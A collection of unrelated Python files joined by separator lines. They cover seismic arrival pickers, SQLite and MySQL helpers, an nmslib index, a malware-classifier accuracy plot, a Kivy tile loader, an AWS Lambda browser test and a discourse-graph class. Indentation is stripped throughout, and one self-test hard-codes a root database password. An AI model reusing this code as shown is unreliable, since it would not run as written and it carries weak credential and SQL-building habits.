r_squaresum -= arr[i] ** 2
result[i] = r_squaresum / (safety_eps + l_squaresum)
if result[i] > max_value:
max_value = result[i]
max_index = i
return result, max_index
@njit
def modified_energy_ratio(arr: np.ndarray, win_len: int = 100) -> Tuple[np.ndarray, int]:
"""
Modified energy ratio method for arrival time estimation.
The modifications improve the ability to detect the onset of a seismic
arrival in the presence of random noise.
Args:
arr: Transient signal of hit
win_len: Samples of sliding windows. Default: 100
Returns:
- Array with computed detection function
- Index of the estimated arrival time (max value)
References:
- Han, L., Wong, J., & Bancroft, J. C. (2009).
Time picking and random noise reduction on microseismic data.
CREWES Research Report, 21, 1–13.
"""
n = len(arr)
result, _ = energy_ratio(arr, win_len)
max_value = -math.inf
max_index = 0
for i in range(n):
result[i] = (result[i] * abs(arr[i])) ** 3
if result[i] > max_value:
max_value = result[i]
max_index = i
return result, max_index
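# Hedged usage sketch (the helper name and signal parameters are illustrative,
# not part of the original module): apply all four pickers to a synthetic
# transient -- pre-trigger noise followed by a decaying sinusoidal burst --
# and collect the estimated onset indices. Assumes a recent numpy
# (np.random.default_rng) and an installed numba.
def _demo_pickers(n_pre=500, n_burst=1500):
    rng = np.random.default_rng(0)
    signal = 0.01 * rng.standard_normal(n_pre + n_burst)
    t = np.arange(n_burst)
    signal[n_pre:] += np.exp(-t / 300.0) * np.sin(2 * np.pi * t / 25.0)
    signal = signal.astype(np.float32)
    return {
        "hinkley": hinkley(signal)[1],
        "aic": aic(signal)[1],
        "energy_ratio": energy_ratio(signal, 100)[1],
        "modified_energy_ratio": modified_energy_ratio(signal, 100)[1],
    }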
|
###############################################################################
# convert list of row tuples to list of row dicts with field name keys
# this is not a command-line utility: hard-coded self-test if run
###############################################################################
def makedicts(cursor, query, params=()):
cursor.execute(query, params)
colnames = [desc[0] for desc in cursor.description]
rowdicts = [dict(zip(colnames, row)) for row in cursor.fetchall()]
return rowdicts
if __name__ == '__main__': # self test
import MySQLdb
conn = MySQLdb.connect(host='localhost', user='root', passwd='python')
cursor = conn.cursor()
cursor.execute('use peopledb')
query = 'select name, pay from people where pay < %s'
lowpay = makedicts(cursor, query, [70000])
    for rec in lowpay: print(rec)
|
# This sample uses a non-breaking space, which should generate errors in
# the tokenizer, parser and type checker.
# The space between "import" and "sys" is a non-breaking UTF8 character.
import sys
|
import numpy as np
from time import perf_counter
from os import getcwd
from sqlite3 import connect, Error
# modules imported
id_to_table_name = { 0:'up', 1:'left', 2:'right', 3:'down'}
# Write your code below
def createConnection( db_file):
""" create a database connection to a SQLite database and returns it """
conn = None
try:
conn = connect( db_file)
return conn
except Error as e:
print(e)
return conn
def createTable( db_dir, table_name, func, if_id= False):
""" create a table in a database\n
takes in the directory of the database and the name of the table to be created\n
this table is specific to the current IP detection array\n
func decides what type of table you want to create - vehicles or time\n
Returns the column names of the table as a list.
"""
if if_id:
table_name = id_to_table_name[table_name]
try:
# creating connection
conn = createConnection( db_dir)
# thinking that latest data will be at the last so no other values
if func == 'vehicle':
create_table_sql = """CREATE TABLE IF NOT EXISTS {}(
id INTEGER PRIMARY KEY,
car INTEGER,
motorcycle INTEGER,
bus INTEGER,
truck INTEGER,
person INTEGER,
bicycle INTEGER,
traffic_light INTEGER);""".format( table_name)
elif func == 'time':
create_table_sql = 'CREATE TABLE IF NOT EXISTS '+table_name+'( id INTEGER PRIMARY KEY, time REAL);'
# creating table
conn.execute(create_table_sql)
conn.commit()
# closing connection
conn.close()
except Error as e:
print(e)
# closing connection
conn.close()
if func == 'vehicle':
return ['id', 'car', 'motorcycle', 'bus', 'truck', 'person', 'bicycle', 'traffic_light']
elif func == 'time':
return ['id', 'time']
def insertData( db_dir, table_name, data, func, if_id= False):
"""
Inserts data into the data table\n
db_dir contains the directory of the database\n
table name is the name of the table you want to store value in\n
data is the data to be stored in the table \n
func decides what type of data you want to store - vehicles or time\n
WARNING:\n
data should be an array of dimension (7,) for vehicles and (1,) for time\n
"""
if if_id:
table_name = id_to_table_name[table_name]
# creating connection
conn = createConnection( db_dir)
cur = conn.cursor()
# info_dict = {}
if func == 'vehicle':
# creating SQL statement
sql_statement = 'INSERT INTO {}( car, motorcycle, bus, truck, person, bicycle, traffic_light) VALUES(?,?,?,?,?,?,?) '.format( table_name)
# preparing for the data
elif func=='time':
# creating SQL statement
sql_statement = '''INSERT INTO {}(time) VALUES(?)'''.format( table_name)
# storing data
data= data.tolist()
cur.execute(sql_statement,data)
conn.commit()
# closing connection
conn.close()
return 'data stored'
def getAllData( db_dir, table_name, if_id= False):
"""
Gets all the data from the table in the database\n
db_dir contains the directory of the database\n
table name is the name of the table you want to get values from\n
prints all the values one by one\n
returns the list of the data with each element as the data\n
"""
if if_id:
table_name = id_to_table_name[table_name]
# creating connection
conn = createConnection( db_dir)
cur = conn.cursor()
# getting all data
cur.execute('SELECT * FROM {}'.format( table_name))
data_point = 0
ret_data = []
# looping over the data
while data_point != None:
# taking one point out
data_point = cur.fetchone()
# adding value to return list if data is present
if data_point != None:
ret_data.append( data_point[1:])
else:
break
#closing connection
conn.close()
return ret_data
def getLastPoint( db_dir, table_name, if_id= False):
"""
db_dir contains the directory of the database\n
table name is the name of the table you want to get value from\n
returns the last point of the data from the database\n
"""
if if_id:
table_name = id_to_table_name[table_name]
# creating connection
conn = createConnection( db_dir)
cur = conn.cursor()
# getting all data
cur.execute('''SELECT * FROM {0} WHERE id = ( SELECT MAX(id) FROM {0})'''.format( table_name))
# sql_statement = '''SELECT * FROM {}
# ORDER BY column_name DESC
# LIMIT 1; '''.format( )
data_point = 0
data_point = cur.fetchone()
#closing connection
conn.close()
if data_point != None:
return data_point[1:]
else:
print( 'no data present')
return None
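# Hedged usage sketch (the helper name, database path and counts are
# illustrative, not part of the original module): create the 'up' vehicle
# table in a throwaway SQLite file, store one detection row and read it back.
def _demo_vehicle_table(db_dir='traffic_demo.db'):
    columns = createTable(db_dir, 0, 'vehicle', if_id=True)  # table id 0 -> 'up'
    counts = np.array([3, 1, 0, 2, 5, 0, 1])  # car .. traffic_light
    insertData(db_dir, 0, counts, 'vehicle', if_id=True)
    return columns, getLastPoint(db_dir, 0, if_id=True)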
|
# -*- coding: utf-8 -*-
import nmslib
import numpy as np
class InteractionIndex(object):
def __init__(self, interaction_mapper, interaction_vectors, method="ghtree", space="cosinesimil"):
self.im = interaction_mapper
self.interaction_vectors = interaction_vectors
self.index = nmslib.init(method=method, space=space)
self.index.addDataPointBatch(interaction_vectors)
if method == "hnsw":
self.index.createIndex({'post': 2}, print_progress=True)
elif method == "ghtree":
self.index.createIndex()
else:
self.index.createIndex()
# if self.cf.short:
# self.index = nmslib.init(method='ghtree', space='cosinesimil')
# self.index = nmslib.init(method='ghtree', space='l2')
# else:
# # self.index = nmslib.init(method='hnsw', space='cosinesimil')
# # self.index = nmslib.init(method='ghtree', space='l2')
# self.index = nmslib.init(method='ghtree', space='cosinesimil')
# self.index.addDataPointBatch(interaction_vectors)
# # self.index.createIndex({'post': 2}, print_progress=True)
# self.index.createIndex()
def knn_idx_query(self, idx_int, k=1):
try:
query_vector = self.interaction_vectors[idx_int]
        except Exception:
print("Error: no corresponding interaction found")
return [], [], []
return self.knn_vector_query(query_vector, k=k)
def knn_vector_query(self, vec, k=1):
query_vector = vec
ids, distances = self.index.knnQuery(query_vector, k=k)
ret_interaction = [self.im.num_to_interaction(id) for id in ids]
return ret_interaction, ids, distances
def knn_interaction_query(self, interaction_str, k=1):
return self.knn_idx_query(self.im.interaction_to_num(interaction_str), k=k)
def safe(self, path):
np.savetxt(path + "/interaction_index.txt", self.interaction_vectors, delimiter=",")
self.im.save(path)
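# Hedged usage sketch (the toy mapper and helper below are illustrative, not
# part of the original module): the real interaction_mapper is only assumed
# to provide num_to_interaction / interaction_to_num / save. Builds an index
# over random vectors and queries the 3 nearest neighbours of item 0.
class _ToyMapper(object):
    def __init__(self, names):
        self.names = list(names)
    def num_to_interaction(self, idx):
        return self.names[idx]
    def interaction_to_num(self, name):
        return self.names.index(name)
    def save(self, path):
        pass

def _demo_interaction_index():
    vectors = np.random.rand(10, 8).astype(np.float32)
    index = InteractionIndex(_ToyMapper(["i%d" % i for i in range(10)]),
                             vectors, method="hnsw")
    return index.knn_idx_query(0, k=3)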
|
import numpy as np
import pandas as pd
def main(payload):
df_list = []
for key, value in payload.items():
df = pd.DataFrame(value)
df = df.set_index("timestamp")
if key != "base":
df = df.rename(
columns={
"value": key,
"data": key,
},
)
df_list.append(df)
response_df = pd.concat(df_list, axis=1)
response_df = response_df.replace({np.nan: None})
response_df["timestamp"] = response_df.index
response = response_df.to_dict(orient="records")
return response
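# Hedged usage sketch (the payload contents are illustrative, not part of the
# original module): the payload is assumed to map series names to lists of
# {"timestamp": ..., "value"/"data": ...} records; "base" keeps its original
# column name, every other series is renamed to its key before the outer
# join on timestamp.
def _demo_main():
    payload = {
        "base": [{"timestamp": 1, "value": 10.0}, {"timestamp": 2, "value": 11.0}],
        "sensor_a": [{"timestamp": 1, "value": 0.5}],
    }
    # expected: [{'value': 10.0, 'sensor_a': 0.5, 'timestamp': 1},
    #            {'value': 11.0, 'sensor_a': None, 'timestamp': 2}]
    return main(payload)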
|
import numpy as np
import matplotlib.pyplot as plt
''' Shot Accuracy Plot
ticks = [5,6,7,8,9,10,11,12,13,14,15]#[1,2,3,4,5]
data_lists = [
[92.35,92.52,93.2,93.71,93.85,94.15,94.22,94.37,94.68,94.73,94.82],
[89.15,89.74,90.41,90.88,91.31,91.47,91.84,92.03,92.2,92.3,92.48],
[86.13,86.98,87.8,88.15,88.71,89.22,89.43,89.6,89.87,90.05,90.16],
[80.04,81.38,82.39,83.09,83.61,84.21,84.6,85.16,85.35,85.79,85.99]
]#[[0.4,1.2,2.3,4,5.5]]
label_lists = [
'VirusShare_00177 5-way',
'VirusShare_00177 10-way',
'APIMDS 5-way',
'APIMDS 10-way'
]#['test1']
color_lists = ['red', 'red', 'royalblue', 'royalblue'] #['red']
marker_lists = ['o', '^', 'o', "^"]#['.']
'''
ticks = [50,100,150,200,250,300,350,400,450,500]
data_lists = [
[91.04,91.71,92.11,92.35,91.8,91.55,90.71,91.05,90.22,90.12],
[87.44,88.64,88.7,89.15,88.07,87.88,87.77,87.64,87.46,87.02],
[77.7,82.37,84.97,85.57,85.92,86.16,86.32,83.78,84.3,84.27],
[69.09,75.63,79,80.04,79.61,80.04,79.42,77.09,78.87,76.9]
]
label_lists = [
"VirusShare_00177 5-shot 5-way",
"VirusShare_00177 5-shot 10-way",
"APIMDS 5-shot 5-way",
"APIMDS 5-shot 10-way"
]
color_lists = ['orange', 'orange', 'lightgreen', 'lightgreen']
marker_lists = ['s', 'D', 's', 'D']
marker_size = 6
title = ''
x_title = 'Sequence Length'
y_title = 'Accuracy(%)'
fig_size = (10,8)
dpi = 300
plt.figure(dpi=dpi)
plt.xticks(ticks)
plt.title(title)
plt.xlabel(x_title)
plt.ylabel(y_title)
plt.grid(True)
for data,label,color,marker in zip(data_lists,label_lists,color_lists,marker_lists):
plt.plot(ticks, data, color=color, marker=marker, label=label, markersize=marker_size)
plt.legend()
plt.show()
|
class TreeUtils:
@staticmethod
def print_tree_indent(T, p, depth):
''' prints tree in preorder manner
Cars
BMW
BMW_M4
AUDI
AUDI_A6
FIAT
MERCEDES
MERCEDES CLA
MERCEDES C63 AMG
VOLVO
To print the whole tree use this function with arguments (T, T.root(), 0)
'''
print(2*depth*' ' + str(p.element()))
for c in T.children(p):
TreeUtils.print_tree_indent(T, c, depth+1)
@staticmethod
def print_tree_labeled_ident(T, p, depth):
''' prints tree in preorder manner
Cars
1 BMW
1.1 BMW_M4
2 AUDI
2.1 AUDI_A6
3 FIAT
4 MERCEDES
4.1 MERCEDES CLA
4.2 MERCEDES C63 AMG
5 VOLVO
To print the whole tree use this function with arguments (T, T.root(), 0)
'''
TreeUtils._print_tree_labeled_indent(T, p, depth, list())
@staticmethod
def _print_tree_labeled_indent(T, p, depth, path):
''' private function '''
label = '.'.join(str(j+1) for j in path)
print(2*depth*' ' + label + ' ' + str(p.element()))
path.append(0)
for c in T.children(p):
            TreeUtils._print_tree_labeled_indent(T, c, depth+1, path)
path[-1]+=1
path.pop()
@staticmethod
def print_tree_parenthesize(T, p):
print(p.element(), end='')
first = True
for c in T.children(p):
part = ' (' if first else ', '
print(part, end='')
TreeUtils.print_tree_parenthesize(T, c)
first = False
print(')', end='')
|
for i in range(1, 6):
if i == 3:
continue
print(i)
|
from slovnet.markup import SyntaxMarkup
from slovnet.mask import split_masked
from .base import Infer
class SyntaxDecoder:
def __init__(self, rels_vocab):
self.rels_vocab = rels_vocab
def __call__(self, preds):
for pred in preds:
head_ids, rel_ids = pred
ids = [str(_ + 1) for _ in range(len(head_ids))]
head_ids = [str(_) for _ in head_ids.tolist()]
rels = [self.rels_vocab.decode(_) for _ in rel_ids]
yield ids, head_ids, rels
class SyntaxInfer(Infer):
def process(self, inputs):
for input in inputs:
input = input.to(self.model.device)
pred = self.model(input.word_id, input.shape_id, input.pad_mask)
mask = ~input.pad_mask
head_id = self.model.head.decode(pred.head_id, mask)
head_id = split_masked(head_id, mask)
rel_id = self.model.rel.decode(pred.rel_id, mask)
rel_id = split_masked(rel_id, mask)
yield from zip(head_id, rel_id)
def __call__(self, items):
inputs = self.encoder(items)
preds = self.process(inputs)
preds = self.decoder(preds)
for item, pred in zip(items, preds):
ids, head_ids, rels = pred
tuples = zip(ids, item, head_ids, rels)
yield SyntaxMarkup.from_tuples(tuples)
|
from kivy.uix.image import Image
# A graphics manager that manages loading images and provides utility
# for other classes to retrieve them.
class Graphics:
SHEET_TILE_WIDTH = 16
SHEET_TILE_HEIGHT = 16
SHEET_WIDTH_IN_TILES = 21
SHEET_HEIGHT_IN_TILES = 5
def __init__(self):
self.map_sheet = Image(source="dungeon.png")
def get_map_texture(self, index):
# Determine the x and y value of an index. X is tiles to the right and Y is
# tiles up from the bottom. The bottom left tile is index 0 and increases to the
# right and filling up the row and progressing upward.
x, y = index % self.SHEET_WIDTH_IN_TILES, index // self.SHEET_WIDTH_IN_TILES
# There were issues involved with using the entire tile. When scaled, bits
# and pieces outside the region specified were displayed. A one pixel buffer
# is then created around the tile.
# TODO: Determine the root cause and see if the issue above can be resolved.
return self.map_sheet.texture.get_region(x * self.SHEET_TILE_WIDTH + 1, \
y * self.SHEET_TILE_HEIGHT + 1, self.SHEET_TILE_WIDTH - 2, \
self.SHEET_TILE_HEIGHT - 2)
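# Worked example (illustrative): with SHEET_WIDTH_IN_TILES == 21, index 23
# maps to x == 23 % 21 == 2 tiles to the right and y == 23 // 21 == 1 tile
# up from the bottom of the sheet, so the returned region starts at pixel
# (2 * 16 + 1, 1 * 16 + 1) with the one-pixel buffer on each side.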
|
from gw_bot.Deploy import Deploy
from osbot_aws.helpers.Test_Helper import Test_Helper
from osbot_aws.apis.Lambda import Lambda
class test_Chrome_in_Lambda(Test_Helper):
def setUp(self):
super().setUp()
self.lambda_name = 'osbot_browser.lambdas.dev.lambda_shell'
self._lambda = Lambda(self.lambda_name)
def test_update_lambda(self):
self.result = Deploy().deploy_lambda__browser_dev(self.lambda_name)
#@trace(include=['osbot*', 'boto*'])
def test_reset_lambda(self):
self.result = self._lambda.shell().reset()
def test_update_and_invoke(self):
code = """
from osbot_aws.Dependencies import load_dependencies
load_dependencies('pyppeteer2')
from osbot_browser.chrome.Chrome_Sync import Chrome_Sync
chrome = Chrome_Sync().keep_open()
chrome.browser()
#result = chrome.open('https://news.google.com').url()
#from osbot_utils.utils.Misc import bytes_to_base64
#result = bytes_to_base64(chrome.screenshot())
result = chrome.chrome.chrome_setup.connect_method()
"""
self.test_update_lambda()
#self.test_reset_lambda()
self.result = self._lambda.shell().python_exec(code)
def test_update_and_invoke__test(self):
code = """
from osbot_aws.Dependencies import load_dependencies
load_dependencies('pyppeteer2,websocket-client')
from osbot_browser.chrome.Chrome import Chrome
#chrome = Chrome().keep_open()
#from osbot_utils.utils.Http import GET
#result = GET('http://127.0.0.1:54433')
#result = chrome.get_last_chrome_session()
#browser = chrome.sync_browser() # launch it
#browser = Chrome().keep_open().sync_browser() # attach
#result = chrome.connect_method()
from osbot_utils.decorators.Sync import sync
@sync
async def local_chrome():
from osbot_browser.chrome.Chrome import Chrome
from pyppeteer import connect, launch
from osbot_utils.utils.Http import GET
chrome = Chrome().keep_open()
url_chrome = chrome.get_last_chrome_session().get('url_chrome')
#"ws://127.0.0.1:51059/devtools/browser/b2f81e97-78e6-417d-9487-4678b9b94121"
# "ws://127.0.0.1:51059/devtools/browser/b2f81e97-78e6-417d-9487-4678b9b94121"
#return url_chrome
url = "http://127.0.0.1:51059/json/version"
#return GET(url)
await connect({'browserWSEndpoint': url_chrome})
return port_is_open(url_chrome)
await chrome.browser_connect()
return chrome.connect_method()
chrome = Chrome()#.keep_open()
chrome.sync_browser()
result = chrome.connect_method()
# Chrome().keep_open().sync__setup_browser()
# Chrome().keep_open().sync__setup_browser() #.sync_browser()
#result = local_chrome()
# @sync
# async def version():
# from osbot_browser.chrome.Chrome import Chrome
# return await Chrome().keep_open().version()
# chrome = Chrome()
# await chrome.browser()
# return chrome.chrome_executable()
# #'HeadlessChrome/67.0.3361.0'
#
# result = version()
"""
#self.test_update_lambda()
self.result = self._lambda.shell().python_exec(code)
#def test_get_browser_version(self):
#'https://www.whatismybrowser.com/'
# test running webserver in Lambda
def test_run_webserver_in_lambda(self):
#self._lambda.shell().reset()
#self.test_update_lambda()
code = """
from osbot_aws.Dependencies import load_dependencies
load_dependencies('pyppeteer,websocket-client')
from osbot_browser.chrome.Chrome import Chrome
chrome = Chrome()
load_dependencies('requests')
from osbot_browser.browser.Web_Server import Web_Server
from osbot_utils.utils.Misc import bytes_to_base64
chrome.sync__setup_browser()
#page = chrome.sync_page()
#web_server = Web_Server()
#web_server.port = 1234
#web_server.start()
#with Web_Server() as web_server:
#chrome.sync_open(web_server.url())
chrome.sync_open('http://localhost:1234/')
result = bytes_to_base64(chrome.sync_screenshot())
#
# chrome.sync_open('https://www.google.com')
# bytes = chrome.sync_screenshot()
# import base64
# result = base64.b64encode(bytes).decode()
# #result = chrome.sync_url()
"""
self.png_data = self._lambda.shell().python_exec(code)
def test_invoke_shell_commands(self):
shell = self.result = self._lambda.shell()
#self.result = shell.ls('/tmp')
print('-----')
print(shell.ps())
#self.result = shell.memory_usage()
print(shell.list_processes())
#todo: add chrome logs fetch
#todo: add ngrok support
#todo: news.google.com is not working
#bytes = chrome.sync_open('https://news.google.com')
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Seq2Seq model for ConvAI2 (personachat data).
"""
from parlai.core.build_data import download_models
def download(datapath):
opt = {'datapath': datapath}
opt['model'] = 'legacy:seq2seq:0'
opt['model_file'] = 'models:convai2/seq2seq/convai2_self_seq2seq_model'
opt['dict_file'] = 'models:convai2/seq2seq/convai2_self_seq2seq_model.dict'
opt['dict_lower'] = True
opt['model_type'] = 'seq2seq' # for builder
fnames = [
'convai2_self_seq2seq_model.tgz',
'convai2_self_seq2seq_model.dict',
'convai2_self_seq2seq_model.opt',
]
download_models(opt, fnames, 'convai2', version='v3.0')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Arne Neumann <discoursegraphs.programming@arne.cl>
"""
The ``discoursegraph`` module specifies a ``DiscourseDocumentGraph``,
the fundamental data structure used in this package. It is a slightly
modified ``networkx.MultiDiGraph``, which requires every node and edge to have
a ``layers`` attribute (which maps to the set of layers (str) it belongs to).
TODO: implement a DiscourseCorpusGraph
"""
import itertools
import sys
import warnings
from collections import defaultdict, OrderedDict
from networkx import MultiGraph, MultiDiGraph, is_directed_acyclic_graph
from discoursegraphs.relabel import relabel_nodes
from discoursegraphs.util import natural_sort_key
class EdgeTypes(object):
"""Enumerator of edge types"""
pointing_relation = 'points_to'
# reverse_pointing_relation = 'is_pointed_to_by' # not needed right now
dominance_relation = 'dominates'
reverse_dominance_relation = 'is_dominated_by'
spanning_relation = 'spans'
# reverse_spanning_relation = 'is_part_of' # not needed right now
precedence_relation = 'precedes'
class DiscourseDocumentGraph(MultiDiGraph):
"""
Base class for representing annotated documents as directed graphs
with multiple edges.
Attributes
----------
ns : str
the namespace of the graph (default: discoursegraph)
root : str
name of the document root node ID
(default: self.ns+':root_node')
sentences : list of str
sorted list of all sentence root node IDs (of sentences
contained in this document graph -- iff the document was annotated
for sentence boundaries in one of the layers present in this graph)
tokens : list of int
a list of node IDs (int) which represent the tokens in the
order they occur in the text
TODO list:
- allow layers to be a single str or set of str
- allow adding a layer by including it in ``**attr``
- add consistency check that would allow adding a node that
already exists in the graph, but only if the new graph has
different attributes (layers can be the same though)
- outsource layer assertions to method?
"""
    # Create a multidigraph object that tracks the order nodes are added
# and for each node track the order that neighbors are added and for
# each neighbor tracks the order that multiedges are added.
# Cf. nx.MultiDiGraph docstring (OrderedGraph)
node_dict_factory = OrderedDict
adjlist_dict_factory = OrderedDict
edge_key_dict_factory = OrderedDict
def __init__(self, name='', namespace='discoursegraph', root=None):
"""
        Initializes an empty directed graph which allows multiple edges.
Parameters
----------
name : str or None
name or ID of the graph to be generated.
namespace : str
namespace of the graph (default: discoursegraph)
root : str or None
Name of the root node. If None, defaults to namespace+':root_node'.
"""
# super calls __init__() of base class MultiDiGraph
super(DiscourseDocumentGraph, self).__init__()
self.name = name
self.ns = namespace
self.root = root if root else self.ns+':root_node'
self.add_node(self.root, layers={self.ns})
# metadata shall be stored in the root node's dictionary
self.node[self.root]['metadata'] = defaultdict(lambda: defaultdict(dict))
self.sentences = []
self.tokens = []
def add_offsets(self, offset_ns=None):
"""
adds the onset and offset to each token in the document graph, i.e.
the character position where each token starts and ends.
"""
if offset_ns is None:
offset_ns = self.ns
onset = 0
offset = 0
for token_id, token_str in self.get_tokens():
offset = onset + len(token_str)
self.node[token_id]['{0}:{1}'.format(offset_ns, 'onset')] = onset
self.node[token_id]['{0}:{1}'.format(offset_ns, 'offset')] = offset
onset = offset + 1
def get_offsets(self, token_node_id=None, offset_ns=None):
"""
returns the offsets (character starting and end position) of a token
or of all tokens occurring in the document.
Parameters
----------
token_node_id : str, int or None
Node ID of a token from which we want to retrieve the start and end
position. If no node ID is given, this method will yield
(token node ID, start pos, end pos) tuples containing data for all
tokens in the document
offset_ns : str or None
The namespace from which the offsets will be retrieved. If no
namespace is given, the default namespace of this document graph is
chosen
Returns
-------
offsets : tuple(int, int) or generator(tuple(str, int, int))
If a token node ID is given, a (character onset int, character
offset int) tuple is returned. Otherwise, a generator of (token
node ID str, character onset int, character offset int) tuples
will be returned, representing all the tokens in the order they
occur in the document.
"""
if offset_ns is None:
offset_ns = self.ns
try:
if token_node_id is not None:
assert istoken(self, token_node_id), \
"'{}' is not a token node.".format(token_node_id)
onset = self.node[token_node_id]['{0}:{1}'.format(offset_ns, 'onset')]
offset = self.node[token_node_id]['{0}:{1}'.format(offset_ns, 'offset')]
return (onset, offset)
else: # return offsets for all tokens in the document
return self._get_all_offsets(offset_ns)
# if the document doesn't have offsets: add them and rerun this method
except KeyError as e:
self.add_offsets(offset_ns)
return self.get_offsets(token_node_id, offset_ns)
def _get_all_offsets(self, offset_ns=None):
"""
returns all token offsets of this document as a generator of
(token node ID str, character onset int, character offset int) tuples.
Parameters
----------
offset_ns : str or None
The namespace from which the offsets will be retrieved. If no
namespace is given, the default namespace of this document graph is
chosen
Returns
-------
offsets : generator(tuple(str, int, int))
a generator of (token node ID str, character onset int, character
offset int) tuples, which represents all the tokens in the order
they occur in the document.
"""
for token_id, _token_str in self.get_tokens():
onset = self.node[token_id]['{0}:{1}'.format(offset_ns, 'onset')]
offset = self.node[token_id]['{0}:{1}'.format(offset_ns, 'offset')]
yield (token_id, onset, offset)
def get_phrases(self, ns=None, layer='syntax', cat_key='cat', cat_val='NP'):
"""yield all node IDs that dominate the given phrase type, e.g. all NPs"""
if not ns:
ns = self.ns
for node_id in select_nodes_by_layer(self, '{0}:{1}'.format(ns, layer)):
if self.node[node_id][self.ns+':'+cat_key] == cat_val:
yield node_id
def add_node(self, n, layers=None, attr_dict=None, **attr):
"""Add a single node n and update node attributes.
Parameters
----------
n : node
A node can be any hashable Python object except None.
layers : set of str or None
the set of layers the node belongs to,
e.g. {'tiger:token', 'anaphoricity:annotation'}.
Will be set to {self.ns} if None.
attr_dict : dictionary, optional (default= no attributes)
Dictionary of node attributes. Key/value pairs will
update existing data associated with the node.
attr : keyword arguments, optional
Set or change attributes using key=value.
See Also
--------
add_nodes_from
Examples
--------
>>> from discoursegraphs import DiscourseDocumentGraph
>>> d = DiscourseDocumentGraph()
>>> d.add_node(1, {'node'})
# adding the same node with a different layer
>>> d.add_node(1, {'number'})
>>> d.nodes(data=True)
[(1, {'layers': {'node', 'number'}})]
Use keywords set/change node attributes:
>>> d.add_node(1, {'node'}, size=10)
>>> d.add_node(3, layers={'num'}, weight=0.4, UTM=('13S',382))
>>> d.nodes(data=True)
[(1, {'layers': {'node', 'number'}, 'size': 10}),
(3, {'UTM': ('13S', 382), 'layers': {'num'}, 'weight': 0.4})]
Notes
-----
A hashable object is one that can be used as a key in a Python
dictionary. This includes strings, numbers, tuples of strings
and numbers, etc.
On many platforms hashable items also include mutables such as
NetworkX Graphs, though one should be careful that the hash
doesn't change on mutables.
"""
if not layers:
layers = {self.ns}
assert isinstance(layers, set), \
"'layers' parameter must be given as a set of strings."
assert all((isinstance(layer, str) for layer in layers)), \
"All elements of the 'layers' set must be strings."
# add layers to keyword arguments dict
attr.update({'layers': layers})
# set up attribute dict
if attr_dict is None:
attr_dict = attr
else:
assert isinstance(attr_dict, dict), \
"attr_dict must be a dictionary, not a '{}'".format(type(attr_dict))
attr_dict.update(attr)
# if there's no node with this ID in the graph, yet
if n not in self.succ:
self.succ[n] = {}
self.pred[n] = {}
self.node[n] = attr_dict
else: # update attr even if node already exists
# if a node exists, its attributes will be updated, except
# for the layers attribute. the value of 'layers' will
# be the union of the existing layers set and the new one.
existing_layers = self.node[n]['layers']
all_layers = existing_layers.union(layers)
attrs_without_layers = {k: v for (k, v) in attr_dict.items()
if k != 'layers'}
self.node[n].update(attrs_without_layers)
self.node[n].update({'layers': all_layers})
def add_nodes_from(self, nodes, **attr):
"""Add multiple nodes.
Parameters
----------
nodes : iterable container
A container of nodes (list, dict, set, etc.).
OR
A container of (node, attribute dict) tuples.
Node attributes are updated using the attribute dict.
attr : keyword arguments, optional (default= no attributes)
Update attributes for all nodes in nodes.
Node attributes specified in nodes as a tuple
take precedence over attributes specified generally.
See Also
--------
add_node
Examples
--------
>>> from discoursegraphs import DiscourseDocumentGraph
>>> d = DiscourseDocumentGraph()
>>> d.add_nodes_from([(1, {'layers':{'token'}, 'word':'hello'}), \
(2, {'layers':{'token'}, 'word':'world'})])
>>> d.nodes(data=True)
[(1, {'layers': {'token'}, 'word': 'hello'}),
(2, {'layers': {'token'}, 'word': 'world'})]
Use keywords to update specific node attributes for every node.
>>> d.add_nodes_from(d.nodes(data=True), weight=1.0)
>>> d.nodes(data=True)
[(1, {'layers': {'token'}, 'weight': 1.0, 'word': 'hello'}),
(2, {'layers': {'token'}, 'weight': 1.0, 'word': 'world'})]
Use (node, attrdict) tuples to update attributes for specific
nodes.
>>> d.add_nodes_from([(1, {'layers': {'tiger'}})], size=10)
>>> d.nodes(data=True)
[(1, {'layers': {'tiger', 'token'}, 'size': 10, 'weight': 1.0,
'word': 'hello'}),
(2, {'layers': {'token'}, 'weight': 1.0, 'word': 'world'})]
"""
additional_attribs = attr # will be added to each node
for n in nodes:
try: # check, if n is a node_id or a (node_id, attrib dict) tuple
newnode = n not in self.succ # is node in the graph, yet?
except TypeError: # n is a (node_id, attribute dict) tuple
node_id, ndict = n
if not 'layers' in ndict:
ndict['layers'] = {self.ns}
layers = ndict['layers']
assert isinstance(layers, set), \
"'layers' must be specified as a set of strings."
assert all((isinstance(layer, str) for layer in layers)), \
"All elements of the 'layers' set must be strings."
if node_id not in self.succ: # node doesn't exist, yet
self.succ[node_id] = {}
self.pred[node_id] = {}
newdict = additional_attribs.copy()
newdict.update(ndict) # all given attribs incl. layers
self.node[node_id] = newdict
else: # node already exists
existing_layers = self.node[node_id]['layers']
all_layers = existing_layers.union(layers)
self.node[node_id].update(ndict)
self.node[node_id].update(additional_attribs)
self.node[node_id].update({'layers': all_layers})
continue # process next node
# newnode check didn't raise an exception
if newnode: # n is a node_id and it's not in the graph, yet
self.succ[n] = {}
self.pred[n] = {}
self.node[n] = attr.copy()
# since the node isn't represented as a
# (node_id, attribute dict) tuple, we don't know which layers
# it is part of. Therefore, we'll add the namespace of the
# graph as the node layer
self.node[n].update({'layers': set([self.ns])})
else: # n is a node_id and it's already in the graph
self.node[n].update(attr)
def add_edge(self, u, v, layers=None, key=None, attr_dict=None, **attr):
"""Add an edge between u and v.
An edge can only be added if the nodes u and v already exist.
This decision was taken to ensure that all nodes are associated
with at least one (meaningful) layer.
Edge attributes can be specified with keywords or by providing
a dictionary with key/value pairs. In contrast to other
        edge attributes, layers can only be added, not overwritten or
deleted.
Parameters
----------
u,v : nodes
Nodes can be, for example, strings or numbers.
Nodes must be hashable (and not None) Python objects.
layers : set of str
the set of layers the edge belongs to,
e.g. {'tiger:token', 'anaphoricity:annotation'}.
Will be set to {self.ns} if None.
key : hashable identifier, optional (default=lowest unused integer)
Used to distinguish multiedges between a pair of nodes.
attr_dict : dictionary, optional (default= no attributes)
Dictionary of edge attributes. Key/value pairs will
update existing data associated with the edge.
attr : keyword arguments, optional
Edge data (or labels or objects) can be assigned using
keyword arguments.
See Also
--------
add_edges_from : add a collection of edges
Notes
-----
To replace/update edge data, use the optional key argument
to identify a unique edge. Otherwise a new edge will be created.
